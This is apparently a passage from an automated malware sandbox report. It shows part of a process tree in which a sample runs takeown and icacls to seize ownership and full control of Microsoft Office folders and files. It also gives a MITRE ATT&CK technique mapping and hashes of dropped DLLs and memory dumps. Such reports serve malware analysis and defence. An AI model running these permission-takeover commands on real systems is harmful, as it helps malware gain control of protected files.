  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts" /grant Administrators:F
  2⤵
  PID:4704
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\fre" /a
  2⤵
  PID:376
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\fre" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:4468
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Integration" /a
  2⤵
  - Possible privilege escalation attempt
  PID:3500
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Integration" /grant Administrators:F
  2⤵
  PID:4920
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Integration\Integrator.exe" /a
  2⤵
  PID:4648
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Integration\Integrator.exe" /grant Administrators:F
  2⤵
  PID:5300
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Integration\Addons" /a
  2⤵
  PID:5424
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Integration\Addons" /grant Administrators:F
  2⤵
  PID:3088
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe" /a
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:4668
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe" /grant Administrators:F
  2⤵
  PID:4612

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:5740

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4a4 0x4a0
1⤵
PID:4276

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:3428

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Direct Volume Access

T1006

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Discovery

Network Share Discovery

T1135

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Common Files\microsoft shared\MSInfo\590603968

Filesize
424KB

MD5
10c6b1854338651a5063208ac374b756

SHA1
8c54bcbf45ee6eaad6920fd73de726d08a3f5608

SHA256
ee095c2039174f9cddef408bb762ed8783990b9e0d467e779d291e530d2171db

SHA512
a0642fd12ddc6d065a87f966b8453ebcf9cd4acc47e7162d97994659802d93c809901ebb0852bc8d1d99923b6fe360bbd9d51677d89375a08dfd0c7a6ec9dd32

Download Submit
C:\Program Files\Common Files\microsoft shared\ink\msvcp120ex.dll

Filesize
8.0MB

MD5
136226073a4ec8cc5b987f7dc385aa6c

SHA1
f15f0ea3bf9bc327825c65c768b14d98fa06838e

SHA256
d3c74a23b3117b8dcaf591cbf21bc41e9d1c3461183c79adc36ab81b888d9cf2

SHA512
5a7160a41ab2d3addedb9290a1c43dd115488c907822b383d3b08fc09fd07f427bf171a48ce6b78d72251a183d0591318bc24f8adcc7ab78643650fbc2f81dad

Download Submit
C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\msvcp120ex.dll

Filesize
8.0MB

MD5
09deb58e8e830f4a60373d7bdc8a0c8d

SHA1
df76ac0b6032740e49fedc5b17d6bffb26caede9

SHA256
0d812ecee1b1adb575d3cd81e99df88a146226daf7ee12b2b1351739cc03e72e

SHA512
3c7c654501260b11ff4058d742ec91f85549bd039efb9dbff60a25f5ff213bc311dc37a6a1722e945f01cdee38a5979f8a4d71c1f1e1d51772b7272805f2dd30

Download Submit
C:\Windows\System32\msconfig.exe

Filesize
35KB

MD5
62f170fb07fdbb79ceb7147101406eb8

SHA1
d9bbb4e4900ff03b0486fac32768170249dad82d

SHA256
53e000f5aa9b3a00934319db8080bb99cb323bf48fc628a64f75d7847c265606

SHA512
81bd918ec7617acea3d8b5659ac518e5bc19e585f49bdd601fff6fadea95f2fd57450ee41d181280089b92c949289249a350aa5428e2e31b53fdff2f47c46265

Download Submit
memory/4124-0-0x00007FF9B2CE3000-0x00007FF9B2CE5000-memory.dmp

Filesize
8KB

Download
memory/4124-1-0x0000000000150000-0x0000000000962000-memory.dmp

Filesize
8.1MB

Download
memory/4124-2-0x00007FF9B2CE0000-0x00007FF9B37A1000-memory.dmp

Filesize
10.8MB

Download
memory/4124-44-0x00007FF9B2CE3000-0x00007FF9B2CE5000-memory.dmp

Filesize
8KB

Download
memory/4124-46-0x00007FF9B2CE0000-0x00007FF9B37A1000-memory.dmp

Filesize
10.8MB

Download
memory/4124-119-0x000000001CA50000-0x000000001CAB0000-memory.dmp

Filesize
384KB

Download

Resubmissions

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads